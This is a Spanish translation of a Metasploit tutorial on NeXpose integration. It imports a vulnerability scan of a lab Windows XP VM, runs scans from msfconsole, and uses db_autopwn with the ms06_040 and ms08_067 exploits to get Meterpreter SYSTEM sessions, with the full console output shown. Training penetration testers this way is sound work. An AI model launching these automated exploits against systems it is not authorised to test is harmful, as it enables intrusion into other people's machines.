Trabajando con NeXpose
De www.metasploit-es.com.ar
Trabajando con NeXpose
Con la adquisicion de Metasploit por parte de Rapid7, hay actualmente una compatibilidad excelente entre Metasploit y el escaneador de vulnerabilidades NeXpose. Rapid7 tiene una edicion para la comunidad de su escaneador disponible en http://www.rapid7.com/vulnerability-scanner.jsp. Una vez hayamos instalado y actualizado NeXpose, ejecutaremos un escaneo completo con credenciales contra nuestra WinXP VM vulnerable.
Creamos un nuevo reporte en NeXpose y grabamos los resultados del escaneo en formato 'NeXpose Simple XML' que mas tarde podremos importar en Metasploit. Despues, lanzamos Metasploit, creamos una nueva base de datos, y utilizamos el comando 'db_import' para auto-detectar e importar nuestro archivo de resultados del escaneo.
msf > db_create [*] Creating a new database instance... [*] Successfully connected to the database [*] File: /root/.msf3/sqlite3.db msf > db_import /root/report.xml [*] Importing 'NeXpose Simple XML' data [*] Importing host 192.168.1.161 [*] Successfully imported /root/report.xml
Ahora, ejecutando los comandos 'db_services' y 'db_vulns' se mostrara toda la informacion importante sobre vulnerabilidades que Metasploit tiene a su disposicion.
msf > db_services Services ======== created_at info name port proto state updated_at Host Workspace ---------- ---- ---- ---- ----- ----- ---------- ---- --------- 2010-08-22 18:12:03 UTC ntp 123 udp open 2010-08-22 18:12:03 UTC 192.168.1.161 default 2010-08-22 18:12:05 UTC dce endpoint resolution 135 tcp open 2010-08-22 18:12:05 UTC 192.168.1.161 default 2010-08-22 18:12:03 UTC cifs name service 137 udp open 2010-08-22 18:12:03 UTC 192.168.1.161 default 2010-08-22 18:12:03 UTC Windows 2000 LAN Manager cifs 139 tcp open 2010-08-22 18:12:03 UTC 192.168.1.161 default 2010-08-22 18:12:06 UTC snmp 161 udp open 2010-08-22 18:12:06 UTC 192.168.1.161 default 2010-08-22 18:12:05 UTC Windows 2000 LAN Manager cifs 445 tcp open 2010-08-22 18:12:05 UTC 192.168.1.161 default 2010-08-22 18:12:03 UTC microsoft remote display protocol 3389 tcp open 2010-08-22 18:12:03 UTC 192.168.1.161 default msf > db_vulns [*] Time: 2010-08-22 18:12:00 UTC Vuln: host=192.168.1.161 name=NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos refs=CVE-2006-3439,NEXPOSE-dcerpc- ms-netapi-netpathcanonicalize-dos [*] Time: 2010-08-22 18:12:01 UTC Vuln: host=192.168.1.161 name=NEXPOSE-windows-hotfix-ms06-035 refs=CVE-2006-1314,CVE-2006-1315,SECUNIA-21007,NEXPOSE-windows-hotfix-ms06-035 [*] Time: 2010-08-22 18:12:03 UTC Vuln: host=192.168.1.161 name=NEXPOSE-cifs-nt-0001 refs=CVE-1999-0519,BID-494,URL-http://www.hsc.fr/ressources/presentations/null_sessions/,NEXPOSE-cifs-nt-0001 [*] Time: 2010-08-22 18:12:03 UTC Vuln: host=192.168.1.161 name=NEXPOSE-generic-icmp-timestamp refs=CVE-1999-0524,NEXPOSE-generic-icmp-timestamp [*] Time: 2010-08-22 18:12:05 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NEXPOSE-windows-hotfix-ms09-001 refs=CVE-2008-4114,CVE-2008-4835,CVE-2008-4834,SECUNIA-31883,URL-http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-001/,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-002/,NEXPOSE-windows-hotfix-ms09-001 [*] Time: 2010-08-22 18:12:08 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0001 refs=CVE-1999-0186,CVE-1999-0254,CVE-1999-0472,CVE-1999-0516,CVE-1999-0517,CVE-2001-0514,CVE-2002-0109,BID-2807,NEXPOSE-snmp-read-0001 [*] Time: 2010-08-22 18:12:09 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0002 refs=CVE-1999-0516,CVE-1999-0517,CVE-2000-0147,BID-973,URL-ftp://ftp.sco.com/SSE/security_bulletins/SB-00.04a,URL-http://archives.neohapsis.com/archives/bugtraq/2000-02/0045.html,NEXPOSE-snmp-read-0002
Ciertamente podriamos utilizar esta informacion para atacar quirurgicamente vulnerabilidades especificas, pero como estamos en nuestro propio laboratorio y no nos preocupa ser sigilosos, dejaremos que 'db_autopwn' tome ventaja completa de la situacion.
msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
Le diremos a db-autopwn que ataque a todos los objetivos utilizando las vulnerabilidades que se encuentran en la base de datos, y contemplaremos la magia.
msf > db_autopwn -x -e [*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.161:445... [*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.161:445... [*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution... [*] Meterpreter session 1 opened (192.168.1.101:42662 -> 192.168.1.161:4265) at 2010-08-22 12:14:06 -0600 [*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution... [*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution... msf >
Tan simple como eso, ¡y tenemos una sesion del Meterpreter abierta para nosotros!
msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter NT AUTHORITY\SYSTEM @ XEN-XP-SP2-BARE 192.168.1.101:42662 -> 192.168.1.161:4265 msf > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer: XEN-XP-SP2-BARE OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter >
NeXpose desde msfconsole
La integracion Metasploit/NeXpose no se limita a importar archivos de resultados de escaneo. Puedes lanzar directamente escaneos NeXpose desde msfconsole utilizando primeramente el plugin 'nexpose'.
msf > load nexpose
____ _ _ _____ _ _ __ __
| _ \ __ _ _ __ (_) __| |___ | | \ | | ___\ \/ /_ __ ___ ___ ___
| |_) / _` | '_ \| |/ _` | / / | \| |/ _ \\ /| '_ \ / _ \/ __|/ _ \
| _ < (_| | |_) | | (_| | / / | |\ | __// \| |_) | (_) \__ \ __/
|_| \_\__,_| .__/|_|\__,_|/_/ |_| \_|\___/_/\_\ .__/ \___/|___/\___|
|_| |_|
[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
msf > help
NeXpose Commands
================
Command Description
------- -----------
nexpose_activity Display any active scan jobs on the NeXpose instance
nexpose_connect Connect to a running NeXpose instance ( user:pass@host[:port] )
nexpose_disconnect Disconnect from an active NeXpose instance
nexpose_discover Launch a scan but only perform host and minimal service discovery
nexpose_dos Launch a scan that includes checks that can crash services and devices (caution)
nexpose_exhaustive Launch a scan covering all TCP ports and all authorized safe checks
nexpose_scan Launch a NeXpose scan against a specific IP range and import the results
Antes de iniciar un escaneo contra un objetivo, necesitamos primero conectar a nuestro servidor donde se ejecuta NeXpose utilizando el comando 'nexpose_connect' junto con las credenciales para la instancia de NeXpose. Notese que deberas añadir 'ok' al final de la cadena de conexion para permitir las conexiones SSL no verificadas.
msf > nexpose_connect dookie:s3cr3t@192.168.1.152 [-] Warning: SSL connections are not verified in this release, it is possible for an attacker [-] with the ability to man-in-the-middle the NeXpose traffic to capture the NeXpose [-] credentials. If you are running this on a trusted network, please pass in 'ok' [-] as an additional parameter to this command. msf > nexpose_connect dookie:s3cr3t@192.168.1.152 ok [*] Connecting to NeXpose instance at 192.168.1.152:3780 with username dookie... msf >
Ahora que estamos conectados a nuestro servidor, podemos ejecutar un escaneo de vulnerabilidades directamente desde dentro de Metasploit.
msf > nexpose_discover -h
Usage: nexpose_scan [options]
OPTIONS:
-E Exclude hosts in the specified range from the scan
-I Only scan systems with an address within the specified range
-P Leave the scan data on the server when it completes (this counts against the maximum licensed IPs)
-R Specify a minimum exploit rank to use for automated exploitation
-X Automatically launch all exploits by matching reference and port after the scan completes (unsafe)
-c Specify credentials to use against these targets (format is type:user:pass[@host[:port]]
-d Scan hosts based on the contents of the existing database
-h This help menu
-n The maximum number of IPs to scan at a time (default is 32)
-s The directory to store the raw XML files from the NeXpose instance (optional)
-t The scan template to use (default:pentest-audit options:full-audit,exhaustive-audit,discovery,aggressive-discovery,dos-audit)
-v Display diagnostic information about the scanning process
-x Automatically launch all exploits by matching reference after the scan completes (unsafe)
msf > nexpose_discover 192.168.1.161
[*] Scanning 1 addresses with template aggressive-discovery in sets of 32
[*] Completed the scan of 1 addresses
msf >
Nuevamente, ejecutamos 'db_services' y 'db_vulns' y podemos ver que los resultados son de la misma calidad que los importados via el archivo XML.
msf > db_services Services ======== created_at info name port proto state updated_at Host Workspace ---------- ---- ---- ---- ----- ----- ---------- ---- --------- 2010-08-22 18:24:28 UTC ntp 123 udp open 2010-08-22 18:24:28 UTC 192.168.1.161 default 2010-08-22 18:24:30 UTC dce endpoint resolution 135 tcp open 2010-08-22 18:24:30 UTC 192.168.1.161 default 2010-08-22 18:24:28 UTC cifs name service 137 udp open 2010-08-22 18:24:28 UTC 192.168.1.161 default 2010-08-22 18:24:28 UTC Windows 2000 LAN Manager cifs 139 tcp open 2010-08-22 18:24:28 UTC 192.168.1.161 default 2010-08-22 18:24:30 UTC snmp 161 udp open 2010-08-22 18:24:30 UTC 192.168.1.161 default 2010-08-22 18:24:30 UTC Windows 2000 LAN Manager cifs 445 tcp open 2010-08-22 18:24:30 UTC 192.168.1.161 default 2010-08-22 18:24:28 UTC microsoft remote display protocol 3389 tcp open 2010-08-22 18:24:28 UTC 192.168.1.161 default msf > db_vulns [*] Time: 2010-08-22 18:24:25 UTC Vuln: host=192.168.1.161 name=NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos refs=CVE-2006-3439,NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos [*] Time: 2010-08-22 18:24:26 UTC Vuln: host=192.168.1.161 name=NEXPOSE-windows-hotfix-ms06-035 refs=CVE-2006-1314,CVE-2006-1315,SECUNIA-21007,NEXPOSE-windows-hotfix-ms06-035 [*] Time: 2010-08-22 18:24:27 UTC Vuln: host=192.168.1.161 name=NEXPOSE-cifs-nt-0001 refs=CVE-1999-0519,BID-494,URL-http://www.hsc.fr/ressources/presentations/null_sessions/,NEXPOSE-cifs-nt-0001 [*] Time: 2010-08-22 18:24:28 UTC Vuln: host=192.168.1.161 name=NEXPOSE-generic-icmp-timestamp refs=CVE-1999-0524,NEXPOSE-generic-icmp-timestamp [*] Time: 2010-08-22 18:24:30 UTC Vuln: host=192.168.1.161 port=445 proto=tcp name=NEXPOSE-windows-hotfix-ms09-001 refs=CVE-2008-4114,CVE-2008-4835,CVE-2008-4834,SECUNIA-31883,URL-http://www.vallejo.cc/proyectos/vista_SMB_write_DoS.htm,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-001/,URL-http://www.zerodayinitiative.com/advisories/ZDI-09-002/,NEXPOSE-windows-hotfix-ms09-001 [*] Time: 2010-08-22 18:24:33 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0001 refs=CVE-1999-0186,CVE-1999-0254,CVE-1999-0472,CVE-1999-0516,CVE-1999-0517,CVE-2001-0514,CVE-2002-0109,BID-2807,NEXPOSE-snmp-read-0001 [*] Time: 2010-08-22 18:24:35 UTC Vuln: host=192.168.1.161 port=161 proto=udp name=NEXPOSE-snmp-read-0002 refs=CVE-1999-0516,CVE-1999-0517,CVE-2000-0147,BID-973,URL-ftp://ftp.sco.com/SSE/security_bulletins/SB-00.04a,URL-http://archives.neohapsis.com/archives/bugtraq/2000-02/0045.html,NEXPOSE-snmp-read-0002
Como todo esto es demasiada diversion, haremos que db_autopwn asuma el control de nuevo.
msf > db_autopwn -x -e [*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.161:445... [*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.161:445... [*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution... [*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution... [*] Meterpreter session 2 opened (192.168.1.101:51373 -> 192.168.1.161:35156) at 2010-08-22 12:26:49 -0600 [*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution... msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 2 meterpreter NT AUTHORITY\SYSTEM @ XEN-XP-SP2-BARE 192.168.1.101:51373 -> 192.168.1.161:35156 msf > sessions -i 2 [*] Starting interaction with 2... meterpreter > sysinfo Computer: XEN-XP-SP2-BARE OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter > exit [*] Meterpreter session 2 closed. Reason: User exit msf >
Como podemos ver, esta integracion, aunque todavia esta en sus etapas iniciales, es muy beneficiosa y añade un poder increible a Metasploit.
© Offensive Security 2009
Original de www.offensive-security.com Traducido por cbk999
